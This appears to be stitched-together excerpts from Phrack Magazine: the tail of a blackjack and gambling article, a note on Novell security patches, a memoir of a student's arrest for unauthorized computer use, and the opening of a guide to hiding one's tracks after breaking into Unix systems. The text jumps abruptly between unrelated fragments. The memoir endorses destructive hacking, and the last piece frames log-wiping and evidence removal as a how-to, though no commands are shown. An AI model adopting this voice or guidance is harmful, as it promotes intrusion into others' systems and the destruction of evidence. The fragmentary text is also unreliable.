table won't make much sense unless you are already familiar with craps. In
case you have forgotten or didn't know, craps is 'that dice game'. The purpose
of presenting it is to save you $$$$$ <-- Still love that dollar sign key! hehe
SLOTS: Playing slots is a gamble. Obviously you say. No, I mean its a gamble
to play them. House advantages are almost never displayed on a particular slot
machine. Different machines and different locations may have different casino
win percentages. When you go up to a slot machine, you have no idea if its'
advantage over you is 5% or 25%. Unless you have been watching it, you don't
know if it just paid off a big jackpot either. I don't play slots as a matter
of principle. If you do play I think there are still some $.05 slots in Vegas.
Play the nickel slots and keep your shirt, especially if its an LOD T-shirt.
VIDEO POKER: Reference [13] gives the following advice regarding video poker:
"...don't expect to win. Manage your money so that you limit your losses." I
think its a bit negative but I can't argue with the logic. Also, as with
slots, you may want to play at a machine that is networked with others which
has a progressive payoff. This way at least you have a chance of making the
big bucks in addition to those periodic small payoffs.
VIDEO BLACKJACK: If you like to avoid people and like BlackJack, you may be
thinking that this is a great way for you to "hack two systems with one
password" and make a little money on the side. Before you start putting
quarter or dollar tokens into video BlackJack machines there are a couple of
things to know. First, you can't use card counting techniques because
every hand is essentially dealt from a new deck. When the computer deals a
hand it is just providing 'random' cards. Perhaps if you saw the source code,
you may be able to determine some sort of bias but I suspect it would be
minuscule at best. The rules vary from machine to machine and the maximum
allowable bet varies also. As with the video poker and video slot machines,
the owner of the machine may set the options to their taste (amount of profit).
Selected Bibliography:
----------------------
The following are some references you may want to check out and some of my
sources of information for this article. They are not in any particular order
and the format is far from standard as opposed to my thesis bibliography :)
[2] The Gamblers Book Club (its really a store) can sell you a sample of the
BlackJack Forum Newsletter for $10.00. They have all kinds of new and out of
print books, used magazines, etc. They are located in Vegas (630 S. 11th St.)
so stop by in person or call 1-800-634-6243 which was valid as of 6/1/93 since
I just gave them a ring...the guy I spoke to was very nice and helpful so I
thought I'd give them a plug here.
[3] "Beat The Dealer" by Dr. Edward O. Thorp. Make sure you get the SECOND
edition (1966) since it has Dr. Julian Braun's additions to the original 1962
edition.
[4] "Gambling Times Magazine" (now defunct), 'BlackJack Bias Part 1 and 2' July
and August 1987 Issues by Mason Malmuth. This magazine was great because it
kept you up to date on the latest in gambling systems and what casinos are up
to. The article is about the author using his PC to perform simulations
regarding the effects of non-random card distribution on BlackJack.
[5] "Break The Dealer" by Jerry L. Patterson and Eddie Olsen, 1986 Perigee
Books. Worth the money for the chapters on Shuffle Tracking alone.
[7] "The World's Greatest BlackJack Book" revised edition (1987) by Dr. Lance
Humble and Dr. Carl Cooper, Doubleday. I am not sure it is THE world's
greatest, but it is an excellent book. It is 400 pages and provides more
details than you probably care to know about the Hi-Opt I counting system.
[8] "Turning the Tables on Las Vegas" by Ian Anderson, 1978. This is an
excellent book if you were interested in The Social Engineering the Casino
section. The author shares a lot of interesting and funny stories that can
keep you from getting barred. Note that 'Ian Anderson' is the authors' handle.
[9] "Las Vegas, Behind the Tables" by Barney Vinson, 1986, Gollehon Press.
Written by a casino executive, I found it to be quite illuminating.
[10] "Gambling Scams" by Darwin Ortiz, 1990, Carrol Publishing. If you play in
any private games, be sure to read this one to avoid getting screwed. It even
has a section on crooked carnival games.
[11] "Winning Without Counting" by Stanford Wong. This book has an interesting
section on 'Dealer Tells' and how to exploit them.
[14] "Gambling and Society" edited by William R. Eadington, 1976. This book
provides plenty of information on the psychology of gambling. I found the
section on 'Who Wants to be a Professional Gambler?' interesting as the study
indicates the types of vocations that show high correlations with being a
professional gambler. One of those vocations with an 'extremely high
correlation' was being a Secret Service agent. Maybe Agent Foley will change
jobs.....he can't do much worse, ahem. Chapter 24 by James N. Hanson is
entitled "Nonlinear Programming Simulation and Gambling Theory Applied to
BlackJack" which some of you programmers might be interested in.
[16] "Risk of Ruin" by Michael R. Hall available from same source as [15]
above. This paper provides some mathematical formulas for helping you
determine the likelihood of losing portions of your starting bankroll.
Although the equations look complicated, anyone with a $10. scientific
calculator can use them. The author provides source code for a program written
in C that calculates the risk formula. Also get his "Optimal Wagering" file
which helps you determine your bet size.
[17] The movie: "Fever Pitch" starring Ryan 'O Niel. This is the most realistic
movie I have seen regarding the psychology of a gambler. If I recall correctly,
it was made in 1985 and is in most video rental stores.
Final Comments:
---------------
Let me quickly thank those who took the hour to read my article, recommended
corrections and offered their insightful comments: The Marauder, Mark Tabas,
Professor Falken, Al Capone, Jester Sluggo, and Bruce Sterling. Also, I would
like to thank JLE, my 'gambling mentor' mentioned earlier even though he
doesn't know me as 'lex' and probably will never see this file.
If anyone has comments, corrections, etc. feel free to email me. Kindly
note that I have no interest in receiving flames from any self professed
BlackJack experts out there as I do not claim to be an expert and due to size
restrictions, I couldn't get all that complicated regarding counting
techniques and such. Besides, anyone who wants to get serious will take the
time to thoroughly read the references listed in the previous section. My main
purpose was to familiarize you with the game of BlackJack and provide a
resource which can point you in the right direction for more in-depth
information. Thank you for your time and I hope you learned something from
this article even if you don't put any of the information to use.
If you have something really SEKRET to tell me, here is my PGP Public Key:
mQCNAiwEHN4AAAEEAMtDxWI2HYsAQO8QhDBYhHvmn3fzGpKFbimxl34XiQ5woU/K
lqbD53ahfnB9ST22yxEvexXW0VGVVfSp9xiUl7d7RsTm7Uas3OaOOiSFIRCVvcG8
FnWARH0nmELBXYkXXjjvjm2BiCEkn45eFaZPX7KbCuIGVjCe3zltpJGBK2OvAAUR
tCRMZXggTHV0aG9yIDxsZXhAbWluZHZveC5waGFudG9tLmNvbT4=
=LOXY
-----END PGP PUBLIC KEY BLOCK-----
In nearly a year since their release, the programs Hack.exe and View.exe
are still potential threats to the security of Novell Networks. Despite
Novell's commendable response with a patch for the holes these programs
exposed, many system administrators have not yet implemented the fix.
The patches, SECUREFX.NLM for Netware 3.11, and SECUREFX.VAP for Netware
2.2 are available via Novell's NetWire, or from ftp.novell.com. Users
with additional questions about Netware security can call Novell
directly at 800-638-9273.
------------------------------------------------------------------------
end
------------------------------------------------------------------------
end
==Phrack Magazine==
My Bust
Or,
An Odyssey of Ignorance
I am writing this article for the benefit of those who have yet to
become acquainted with the brotherhood of law enforcement, a subculture
as warped and depraved as any criminal organization.
The officer, Police Services Officer Anne Rego, then left the room,
and my immediate concern was to kill all processes and
delete all incriminating files, or at least to arrange an accidental
disruption of power. However, before I could do anything, Miss Rego
reappeared with a grim, mustached police officer and what appeared to be the
cast of Revenge of the Nerds.
I asked if I were under arrest, and finding that I was not, asked
what would happen if I refused their generous offer. They said that
it might have negative repercussions, and that the wise choice was to
accompany them.
While I hope that this article might prevent you from being busted,
I will have been successful if even one person does not make the
mistakes I made when I was busted.
II. Prelude
To provide the reader with context, I shall explain the series of events
which culminated in my apprehension.
However, it was not long before I realized that despite the sheer
power of the system, the user interface was clumsy,
unaesthetic and intolerable to anyone desiring to understand
the machine directly. The damn thing had a virtual punch
card system!
I had heard about Unix, and was interested in trying this system. However,
without an affiliation with the Computer Science Department, I had no
way to get Unix access.
Comparative Literature majors apparently should not clutter their heads with
such useless and destructive nonsense as the Unix operating system,
just as an Engineering major can only be damaged by such
mental clutter as the works of Shakespeare; this, in any case, seemed
to be the only justification for such an arcane, Byzantine
policy of restricting access to a nearly unlimited resource.
Another summer followed, with less cheer than the previous. Very early in the
summer, a moron rear-ended my car without even slowing down before slamming
into me. My mother and stepfather ejected me from their house, and I moved to
Indiana to live with my father. When the insurance money arrived from my
totalled car, I purchased a cheap vehicle and hit the highway with no
particular destination in mind. With a lemming's logic, I turned east instead
of west on I-70, and returned to State College, Pennsylvania.
To read the newspaper article concerning Dale and me, a person who
collects guest accounts is, if not Public Enemy Number One, at least
a major felon who can only be thwarted by the combined efforts of
a major university's police division, two computer science departments,
and Air Force Intelligence, which directly funds CERT.
If the cop understands you, you have no need to explain; if not, you
are wasting your time. In either case, you are giving the police the
rope they need to hang you.
You have nothing to gain by talking to the police. If you are not under
arrest, they can do nothing to you if you refuse to speak to them. If you
must speak to them, insist on having an attorney present. As edifying as it
is to get a first-hand glimpse of the entrenched ignorance of the law-
enforcement community, this is one area of knowledge where book-learning is
far preferable to hands-on experience. Trust me on this one.
"If a bike wasn't locked up, would that mean it was right to steal it or
take it for a joyride?"
"That argument would hold if a computer were a bike; and if the bike
weren't returned when I was done with it; and if, in fact, the bike
hadn't been in the same damn place the whole time you assert it was
stolen."
"No, I do not, and after reading this law you've shown me, I still
do not believe that what I did violates this law. Beyond that, what
happened to presumed innocent until proven guilty?"
The phone on the other end was busy. This could only mean one thing,
that Dale was online. His only crime was that he borrowed an
account from the legitimate user, and used the Huang account
at the Engineering Computer Lab, but I realized after my discussion
with the police that they would certainly not see the matter as
I did.
V. A Desperate Conference
He rapidly disconnected from his session and turned off the computer.
We began to weigh options. We tried to figure out the worst thing they
could do to me. Shortly, we had a list of possibilities. The police
could jail me, which seemed unlikely. The police could simply forget
about the whole thing, which seemed very unlikely. Anything between
those two poles was possible. Anything could happen, and as I was
to find, anything would. We planned believing that it was only
I who was in jeopardy.
If you are ever busted, you will witness the remarkable migration
habits of the fair-weather friend. People who yesterday had
nothing better to do than sit around and drink your wine will
suddenly have pressing duties elsewhere.
If you are lucky, perhaps half a dozen people will consent to speak
to you. If you are very lucky, three of them will be willing to be
seen with you in public.
Very shortly the police would begin going after everyone I knew for no other
reason than that they knew me. I was very soon to be given yet another of the
blessings accorded to those in whom the authorities develop an interest.
I needed them.
At this interview, I was greeted by two new cops. The first cop,
with the face of an unsuccessful pugilist, was Jeffery Jones.
I detested him on sight.
The second, older cop, with brown hair and a mustache, was Wayne
Weaver, and had an affable, but stern demeanor, somewhat reminiscent
of a police officer in a fifties family sitcom.
I was convinced that Wayne and Jeff were pulling the good cop/bad cop
routine, having seen the mandatory five thousand hours of cop shows the
Nielsen people attribute to the average American. This was, I thought,
standard Mutt and Jeff. I was to change my opinion. This was not good
cop/bad cop. It was smart cop/dumb cop. And, more frighteningly, it
was no act.
"Yeah, sure. Like I said, I don't know any criminals. I'm not a criminal,
and I won't turn in anyone for your little witch-hunt, because I don't
know any criminals, and I'd be lying if I gave you any names."
"We won't tell anyone that you told them about us."
"Fuck that. I'll know I did it. How does that affect the morality
of it, anyway?"
"If you help us, we'll help you. When you won't help us, you
stand alone. Those people don't care about you, anyway."
"In fact, one of your friends turned you in. Why should you take
this high moral ground when you're a criminal anyway, and they'd
do the same thing to you if they were in the situation you're in.
You just have us now, and if you won't stand with us, you stand
alone."
"I don't have any names. And no one I knew turned me in."
However, if you feel you must turn someone in to satisfy the cops,
I can only give the advice William S. Burroughs gives in _Junky_
to those in a similar situation: give them names they already have, without
any accompanying information; give them the names of people who have left the
country permanently. Be warned, however, that giving false information to the
police is a crime; stick to true, but entirely useless information.
Now, for those who do not swallow the moral argument for not finking,
I offer a practical argument. If you tell the police about
others you know who have committed crimes, you have admitted
your association with criminals, bolstering their case
against you. You have also added an additional charge against
yourself, that of conspiracy. You have fucked over the very
friends you will sorely need for support in the near future,
because the investigation will drag on for months, leaving your life
in a shambles. You will need friends, and if you have sent
them all up the river, you will have none. Worse, you will
deserve it. You have confessed to the very crimes you
are denying, making it difficult for you to stop giving them
names if you have second thoughts. They have the goods on you.
In addition, any offers they make if you will give them names are legally
invalid and non-binding. They can't do jack-shit for you and wouldn't if they
could. The cop mind is still a human mind, and there is nothing more
despicable to the human mind than a traitor.
Do not allow yourself to become something that you can not tolerate being.
Like Judas, the traitor commits suicide both figuratively and literally.
Wayne assumed that any item on the list, even saved posts from other
people, was something that had been sent to me personally by its
author, and that these people were, thus, involved in some vast conspiracy.
While keeping the printed email out of my sight, he began listing
names and asking me for information about that person. I answered,
for every person, that I knew nothing about that person except what
they knew. He asked such questions as "What is Emily Postnews'
real name, and how is she involved in the conspiracy?"
Owens and Ehrlich returned, and announced that they had discovered
an encrypted file on my account, called holy.nodes. I bitterly regretted
the flippant name, and the arrogance of keeping such a file.
Owens had given the police a tiny bit of evidence to support the
bizarre structure of conspiracy theories they had built; and a paranoid
delusion, once validated in even the most inconsequential manner, becomes
unshakably firm.
Another name surfaced, that of a person who had allowed me to use his
account because our respective machines could not manage a tolerable
talk connection. This person, without his knowledge, joined the
conspiracy. Once again, I foolishly tried to explain the situation.
This simply made it worse, as the cop did not understand a word
I was saying; and Owens was incapable of appreciating the difference
between violating the letter of the law and the spirit of the law.
Finally, Wayne came to Dale's name. Dale did not use his last name
in any of the email he had sent to me, and I hoped that his name
was not in any file on any machine anywhere. I recovered some of
my equilibrium, and refused to answer.
We frequented the library, researching every book dealing with the subject of
computer crime, reading the Pennsylvania State Criminal Code, photocopying and
transcribing important texts, and compiling a disk of information relevant to
the case, including any information that someone "on the outside" would need
to know if we were jailed.
It seemed that wherever I went, there was a police car which slowed
to my pace, and it always seemed that people were watching me. I
tried to convince myself that this was paranoia, that not everyone
could be following me, but the feeling continued to intensify, and
I realized that I had adopted the mentality of the cops,
that we were, essentially, part of the same societal process; symbiotic
and necessary to each other's existence. The term 'paranoia' had no
meaning when applied to this situation; as there were, indeed, people
out to get me; people who were equally convinced that I was out to
get them.
Finally, Dale decided that he was going to contact the police, and
called a friend of his in the police department to ask for assistance
in doing so, Stan Marks [*], who was also an electronic musician.
On occasion, Stan would visit us in the Lab, turning off his walkie-
talkie to avoid the irritation of the numerous trivial assignments
which comprise the day-to-day life of the university cop.
After conferring with Stan, he decided simply to call Wayne and
Jeff on the phone to arrange an interview.
Only if we are all jailed, cops and criminals alike, will the machinery lie
dormant, to rust its way to gentle oblivion; and only then will the ruins be
left undisturbed for the puzzlement of future archaeologists.
I was guilty, but this guilt was not a matter of law. My innocent
actions were those which were to be tried.
If you are ever busted, you will witness this curious inversion of
morality, as if by entering the world of cops you have walked
through a one-way mirror, in which your good actions are suddenly
and arbitrarily punished, and the evil you have done is rewarded.
When asked about the Huang account that Ron Gere had created for
him, he explained that Huang was a nom-de-plume, and certainly not
an alias for disguising crime.
Finally, they said that they wanted him to make a drug buy for
them.
Warning Dale not to leave the area, they terminated the interview.
I felt almost sympathetic toward him, and wondered how it was for
him to be involved in a case so complex and bizarre. I still failed
to realize why he was acting toward us as he was, and realized that
he, similarly, had no idea what to make of us, who must have seemed
to him like remorseless, arrogant criminals. Unlike my prejudiced
views of what a police officer should be, Wayne was a competent,
intelligent man doing the best he could in a situation beyond his
range of experience, and tried to behave in a conscientious manner.
I feel that Wayne was a good man, but that the very system
he upheld gave him no choice but to do evil, without realizing it.
I am frustrated still by the fact that no matter how much we could
discuss the situation, we could never understand each other in
fullness, because our world-views were so fundamentally different.
Unlike so many of the incompetent losers and petty sadists who
find police work a convenient alternative to criminality, Wayne
was that rarity, a good cop.
# ==Phrack Magazine==
IX. Consultations
Dale and I began to consider options in our battle against this senseless
investigation. We spent many nights pondering the issue, and arrived at a
number of conclusions.
Since we had already talked to the police, and were rapidly realizing
what a vast error that had been, we wondered how it was possible
to sidestep, avoid or derail the investigation. We hoped that Ron
Gere and others would not be held accountable for my actions, a wish
that was to be denied.
Dale and I decided, eventually, that the only person who could claim
any real damage was Dhamir Mannai, and we arranged an
appointment with him to discuss what had happened.
The next night, as Dale and I were entering the Music Building, a police
cruiser came to a sudden stop in the parking lot and Wayne walked up to
us with a perturbed expression.
Dale said "So let me get this straight. They saddled the older,
more experienced cop with the recruit?"
"I almost wish you had been in charge of this case, instead of that
goof Jeff," I said.
"Yes, he's too jumpy," said Dale. "Like an Irish Setter with a gun."
"Well, if I'd been in charge of this case," Wayne said, "it would have
been down the pike a long time ago."
"We have three men, throwing another man, into a dumpster, behind
Willard," the voice said.
"I guess this means you have to leave, Wayne," said Dale.
The fact that he was on the board of directors for the Engineering Computer
Lab increased the value of his testimony. We were expecting damaging
testimony from Bryan Jensen of ECL.
While there was nothing he could do until the time came to give testimony,
it was very gratifying to find two friends and allies in what we had
thought was a hostile camp.
X. Going Upstairs
Dale called the Director of Police Services with the slim hope that
he had no knowledge of this investigation and might intervene to stop
it. No dice.
We have found this whole affair to be capricious and arbitrary, and despite
our reasonable requests to demonstrate and display our activities in the
presence of computer-literate parties and with an actual computer, they
have, for whatever reasons, denied direct lines of communication which
could have enabled an expeditious resolution to this problem.
Sincerely yours,
Dale Garrison
Robert W. F. Clark
My advice from this experience is that it is very likely that you will
be able to find advice in what you might think to be a hostile quarter.
To talk to the complaining party and apologize for any damage you might
have caused is an excellent idea, and has a possibility of getting the
charges reduced or perhaps dropped entirely.
Simply because the police list a person as a complaining party does not
necessarily mean that the person necessarily approves of, or even has
knowledge of, the police proceedings. In all likelihood, the complaining
parties have never met you, and have no knowledge of what your
motivations were in doing what you did. With no knowledge of your motives,
they are likely to attribute your actions to malice.
Regardless of the end result, it can't hurt to get some idea of what
the complaining parties think. If you soften outright hostility and
outrage even to a grudging tolerance, you have improved the chance
of a positive outcome.
While the police may object to this in very strong terms, and make dire
and ambiguous threats, without a restraining order of some kind there
is very little they can do unless you have bribed or otherwise
offered a consideration for testimony.
Talking to the police, on the other hand, is a very bad idea, and
will result in disaster. Regardless of any threats and intimidation they
use, there is absolutely nothing they can do to you if you do not
talk to them. Any deal they offer you is bogus, a flat-out lie. They
do not have the authority to offer you a deal. These two facts can not
be stressed enough. This may seem common knowledge, the sort even an
idiot would know. I knew it myself.
The police will encourage you to believe this, and before you realize it
you will have told them everything they want to know.
Simply, if you are not under arrest, walk away. If you are
under arrest, request an attorney.
Don't tell them anything. They'll find out more than enough without
your help.
XI. Interlude
Finally, after what had seemed nearly two weeks of furious activity,
constant harassment and disasters, the investigation entered a more
or less quiescent state. It was to remain in this state for several
months.
This is not to say that the harassment ceased, or that matters improved.
The investigation seemed to exist in a state of suspended animation, from
our viewpoint. Matters ceased getting worse exponentially.
Now, they merely got worse arithmetically.
Over the Christmas break, when the campus was mostly vacant, Dale
noticed a new set of booted footprints in the new-fallen snow every
night, by the window to the Electronic Music Lab, and by that window
only.
Eventually, Dale offered to let me split the rent with him on a room.
The police had 'suggested' that WPSX-TV3 fire him from his job as an
audio technician. Regardless of the legality of this skullduggery,
WPSX-TV3, a public television station, reprehensibly fired him.
This is another aspect of the law-enforcement mentality which bears
close examination.
The spooks at the CIA and NSA also hold this unusual privilege, even if
one does not consider their 'special' operations. What can these
organizations be called if not secret police?
It can not be denied, even by those myopic enough to believe that such
organizations are necessary, that these organizations comprise a vast
and secret government which is not elected and not subject to legal
restraint. Only in the most egregious cases of wrongdoing are these
organizations even censured; and even in these cases, it is only the
flunkies that receive even a token punishment; the principals, almost
without exception, are exonerated and even honored. Those few
who are too disgraced to continue work even as politicians ascend to
the rank of elder statesmen, and write their memoirs free from
molestation.
When your job, your property and your reputation can be destroyed
or stolen without recompense and with impunity, what can our
nation be called but a police state? When the police are even free
to beat you senseless without provocation, on videotape, and still
elude justice, what can this nation be called but a police state?
"If you cannot afford an attorney, one will be provided for you."
This is, perhaps, the biggest lie in the litany of lies
known as the Miranda rights. It is the court which prosecutes
you that decides whether you can afford an attorney, and the same
court selects that attorney.
Without the formal filing of charges, you can not receive the assistance
of a public defender. This is what I was told by the public defender's
office. Merely being investigated apparently does not entail the right
to counsel, regardless of the level of harassment involved in the
investigation.
This might not be the sort of thing one would normally do at a party,
but if you are busted you will find that the investigation takes a
central role in your life. When you are not talking about it, you
are thinking about it. When you are not thinking about it, you are
trying the best you can not to think about it. It is a cherished belief
of mine that anyone who survives a police investigation ought to receive
at least an Associate's degree in Criminal Law; you will learn more about
the law than you ever wished to know.
The person on my right, when I said that Jeffery Jones was in charge
of the case, immediately started. "He was in my high school class,"
said the man, who sported a handlebar mustache.
"Well, all I really know about him is that he went out to be a cop in
Austin, but he couldn't take it, had a breakdown or something, and came
back here."
This was to be several weeks. Though we had given the police our work
schedules, phone numbers at home, work and play; and informed them when
they might be likely to locate us at any particular place, we had apparently
underestimated the nearly limitless incompetence of Penn State's elite
computer cops.
As he was walking to work one day, Dale saw Jeffery Jones driving
very slowly and craning his neck in all directions, apparently looking
for someone. However, he failed to note the presence of Dale, the only
person on the street. Dale wondered whether Jeffery had been looking for
him.
The next night at the Lab, the telephone rang. With a series of typical,
frenzied accusations Jeffery Jones initiated the conversation. He believed
that we had been attempting to escape or evade him in some manner. Wayne
was on another line, and Dale and I talked from different phones.
"We told you where we'd be. You said you'd be in touch," I said.
"Look, you have our goddamn work schedule, our address, our phone
numbers, and where we usually are. What the hell else do you need?"
asked Dale.
"We went to your address. The guy we talked to didn't know where
you were," said Wayne.
As we discovered later that night, the police had been at our apartment,
and had knocked on the wrong door, that of our downstairs neighbor,
a mental patient who had been kicked out of the hospital after Reagan's
generous revision of the mental health code. His main activity was
shouting and threatening to kill people who weren't there, so the
consternation of the police was not surprising.
"So we weren't there. You could have called," said Dale.
"I just hope you don't decide to leave the area. We're going to
arrest you in a couple of days," said Wayne.
"You've been saying that for the last three months," I said.
"What's taking so long?"
"Hell, I'll come down and type up the damn thing myself, if
it's too tough for the people you have down there," I offered.
"Look, when you want to arrest us, just give us a call and we'll
come down. Don't pull some dumb cop routine like kicking in the
door," said Dale.
"By the way, Jeff, I heard you couldn't hack it in Austin," I said.
Silence followed.
We said our goodbyes, except for Jeffery, and hung up the phones.
I somewhat regretted the last remark, but was still happy with its
reception. It is probably unwise to play Scare-the-Cops, but by
then I no longer gave a damn. He was probably dead certain that I
had found this information, and other tidbits of information I had
casually mentioned, in some sort of computer database. His mind
was too limited to consider the possibility that I had met an old
high-school chum of his and pumped him for information.
By this time, our fear of the police had diminished, and both of
us were sick to death of the whole business. We just hoped that
whatever was to happen would happen more quickly.
At least, upon arrest, we would enter a domain where there were some
rules of conduct and some certainty. The Kafkaesque uncertainty and
arbitrarily redefined rules inherent in a police investigation were
intolerable.
There was soap and water for washing the ink from our
fingers. However, it left the faintest trace of ink on the pads
of my fingers, and I looked at the marks with awe, realizing that
I had been, in a way, permanently stigmatized.
Jeffery did not take the mug shots. A photographer took them.
Therefore, it went smoothly.
While reading the first five pages of this astounding document, I attempted
to maintain an air of solemnity. However, by the sixth page, I was stifling
giggles. By the seventh, I was chuckling out loud. By the eighth page I
was laughing. By the ninth page I was laughing loudly, and I finished the
rest of the document in gales of mirth. Everyone in the room stared at me
as if I were insane. This didn't bother me. Most of my statements to the
police resulted in this sort of blank stare. Even Dale looked as if
he thought I had cracked, but he understood when he saw his arrest
warrant affidavit, nearly identical to mine.
I simply was unable to take seriously that I had spent months worrying
about what kind of a case they had, when their best effort was this
farrago of absurdities.
Being over a month in arrears for rent, we did not like the idea
of our landlord seeing us arrive in separate police cars; also,
our address was rather notorious, and other residents would be
greatly suspicious if they saw us with cops.
Going to the quarter-page ads, then the red-lettered names, then the
schmucks with nothing but names, we received the same sort of numbers.
Finally talking to the _pro bono_ attorneys, we found that we were
entitled to a reduction in rates of almost fifty per cent.
This generosity brought the best price down to around three thousand
dollars, which was three thousand dollars more than we could afford.
We discussed the case with our new attorneys, and were told that the
best action we could take to defend ourselves was to do nothing.
As none of the systems into which I had intruded had any sort of warning
against unauthorized access, this was considered a plausible defense.
"I just had a case where a guy pumped four bullets into his brother-in-law,
just because he didn't like him, and the arrest warrant for that was two
pages long. One and a half, really," said Brad.
"Does this help us, at all, that this arrest warrant is just demonstrably
false, that it literally has over a hundred mistakes in it?" I asked.
The arraignment was a simple procedure, and was over in five minutes.
Prior to our arraignment, five other people were arraigned on charges
of varying severity, mainly such heinous crimes as smoking marijuana
or vandalism.
Dale stepped in front of the desk first. He was informed of the charges
against him, asked if he understood them, and that was it.
I stepped up, but when the judge asked me whether I understood the charges,
I answered that I didn't, and that the charges were incomprehensible
to a sane human being. I had hoped for some sort of response, but
that was it for me, too.
During this week, we were informed that Dale's too good to be true
attorney, Brad Lunsford, had went over to the District Attorney's
office. He was replaced by Dave Crowley, the Chief District Attorney,
a perpetually bitter, pock-faced older man with the demeanor and
bearing of an angry accountant.
We dressed quite sharply, Dale in new wool slacks and jacket. I dressed
in a new suit as well, and inserted a carnation in my buttonhole as
a gesture of contempt for the proceedings.
Finally Deb Lux arrived, with a sheaf of documents, and immediately left,
saying that she would return shortly. A little over twenty minutes later,
she returned to announce that she had struck a deal with Eileen Tucker,
the Assistant District Attorney.
I was glad not to have to deal with Eileen Tucker, a woman affectionately
nicknamed by other court officials "The Wicked Witch of the West."
With her pallid skin, and her face drawn tightly over her skull as
if she had far too much plastic surgery, this seemed an adequately
descriptive name, both as to appearance and personality.
The fines were approximately two thousand dollars apiece, with Dale
arbitrarily receiving a fine two hundred dollars greater than mine.
After a moment of thought, we decided that the fines were too large.
We turned down the deal, and asked her if she could get anything
better than that.
We discussed the deal outside with Richard Devon; Dhamir Mannai had left,
having pressing engagements both before and after his testimony had
been scheduled. We agreed that a trial would probably have resulted
in an eventual victory, but at what unaffordable cost? We had no
resources or time for a prolonged legal battle, and no acceptable
alternative to a plea-bargain.
For, while entering the Electronic Music Lab one fine spring night,
Andy Ericson [*], a locally-renowned musician, was halted by the
University Police outside the window, as he prepared to enter.
We quickly explained that we were authorized to be present, and
immediately presented appropriate keys, IDs and other evidence that
we were authorized to be in the Lab.
Still, the police continued their series of visits to the Lab, under
one ruse or another. Jeffery Jones, one night, threatened to arrest
Dale for being in the Electronic Music Lab, though he had been informed
repeatedly that Dale's access was authorized by the School of Music. Dale
turned over his keys to Police Services the following day, resenting it
bitterly.
This, however, was not to be a victory for the cops, but a crushing
embarrassment. While their previous actions had remained at least
within the letter of the law and of university policy, this was
egregious and obvious harassment, and was very quickly quashed.
Bob Wilkins, the supervisor of the Electronic Music Lab; Burt Fenner,
head of the Electronic Music division; and the Dean of the College of
Arts and Architecture immediately drafted letters to the University
Police objecting to this illegal action; as it is the professors and
heads of departments who authorize keys, and not the University
Police. The keys were returned within three days.
The police, Jeffery and others, always had some pretext for these visits,
but the fact that these visits only occurred when Dale was
present in the Lab, and that they visited no one else, seems to be
solid circumstantial evidence that they were more than routine
checkups.
One day, Dale received in the mail a subpoena, which informed him that
his testimony was required in the upcoming trial of Ron Gere, who
had moved to Florida. The cops had charged him with criminal
conspiracy in the creation of the Huang account at the Engineering
Computer Lab.
This was not necessary. As it happened, Ron was to drive well over
two thousand miles simply to sign a paper and receive ARD. The three
of us commiserated, and then Ron was on his way back to Florida.
XVII. Sentencing
We sat.
The presiding judge, the Hon. David C. Grine, surveyed with evident
disdain a room full of criminals like us. Deborah Lux was there, once
again serving as counsel. David Crowley was mercifully absent.
The judge briefly examined each case before him. For each case, he announced
the amount of the fine, the time of probation, and banged his gavel.
Immediately before he arrived at our case, he looked at a man directly to
our left. Instead of delivering the usual ARD sentence, he flashed a
sadistic grin and said: "Two years jail." Dealing marijuana was the crime.
The man's attorney objected. The judge said: "Okay, two years, one
suspended." The attorney, another flunky from the public defender's
office, sat down again. Two cops immediately dragged the man from the
courtroom to take him to jail.
I did not pay my fine in the monthly installments the court demanded.
I ignored virtually every provision of my probation. I did not remain
in touch with my probation officer, almost determined that my absence
should be noticed. I did a lot of drugs, determined to obliterate all
memory of my previous life. In Seattle, heroin was a drug of choice,
so I did that for a while.
If my fines were not paid, my ARD would be revoked, and a new trial
date would be set. I was half determined to return and fight this
case, still ashamed of having agreed to such a deal under duress.
However, after discussing it at exhaustive length with everyone I
knew, I came to the conclusion that to do so would be foolish and quixotic.
Hell, I thought, Thoreau did the same thing in a similar circumstance;
why shouldn't I?
Even now, when I have had several years to gain distance and perspective,
there does not seem to be a clear moral; only several pragmatic
lessons.
The goal of hacking is, and always has been, the desire for full
disclosure of that information which is unethically and illegally
hidden by governments and corporations; add to that a dash of
healthy curiosity and a hint of rage, and you have a solvent capable
of dissolving the thickest veils of secrecy. If destructive means
are necessary, by all means use them; but be sure that you are not
acting from hatred, but from love.
Our actions are not, in the wake of Operation Sun-Devil and the
Clipper Chip proposal, entirely free. The government has declared
war on numerous subsections of its own population, and thus has
defined the terms of the conflict. The War on Drugs is a notable
example, and we must ask what sort of a government declares war
on its own citizens, and act accordingly.
Those of us who stand for liberty must act while we still can.
It is later than we think.
---------
APPENDIX A
[From cert-clippings]
Clark, who faces the more serious felony charges, allegedly used two computer
accounts without authorization from the Center of Academic Computing or the
Computer Science Department and, while creating two files, erased a file from
the system. [...] When interviewed by University Police Services, Clark
stated in the police report that the file deleted contained lists of various
groups under the name of "ETZGREEK." Clark said the erasure was accidental,
resulting from an override in the file when he tried to copy it over onto a
blank file. According to records, Clark is accused of running up more than
$1000 in his use of the computer account. Garrison is accused of running up
more than $800 of computer time.
#
==Phrack Magazine==
#!/bin/sh
# Playing Hide and Seek, Unix style.
# By Phreak Accident
#
# A "how-to" in successfully hiding and removing your electronic footprints
# while gaining unauthorized access to someone else's computer system (Unix in
# this case).
# Start counting ..
Hmm. Sucks don't it? Breaking into a system but only to have your access
cut off the next day. Right before you had the chance to download that 2
megabyte source code file you have been dying to get all year.
Why was the access cut? Damn, you forgot to nuke that .rhosts file that
you left in the root directory. Or maybe it was the wtmp entries you didn't
bother to edit. Or perhaps the tcp_wrapper logs that you didn't bother to
look for. Whatever it was, it just screwed your access and perhaps, just
got you busted.
The following are logs generated from the time the break-in
occurred.
[/usr/adm/wtmp]:
[/usr/adm/messages]:
[/usr/adm/pacct]:
We have found and plugged the areas of vulnerability and have restored
original binaries back to the system. We have already informed the proper
authorities of the breakin, including the domain contact at the remote
host in question.
Can you please relay any information regarding incident reports in our
area?
Mark Dorkenski
Network Operations
Hey, it's human nature to be careless and lazy. But, when you're a hacker,
and you're illegally breaking into computer systems this isn't a luxury that
you can afford. Your efforts in penetrating have to be exact, concise,
sharp, witty and skillful. You have to know when to retreat, run, hide,
pounce or spy. Let us put it this way, when you get your feet muddy and
walk on new carpet without cleaning it up, you're gonna get spanked.
I can't tell you how many times I've see a hacker break into a system and
leave their muddy footprints all over the system. Hell, a quarter of the
hosts on the Internet need to be steam-cleaned.
This is sad. Especially since you could have had the ability to do the
washing yourself. Why bother cracking systems if you leave unauthorized login
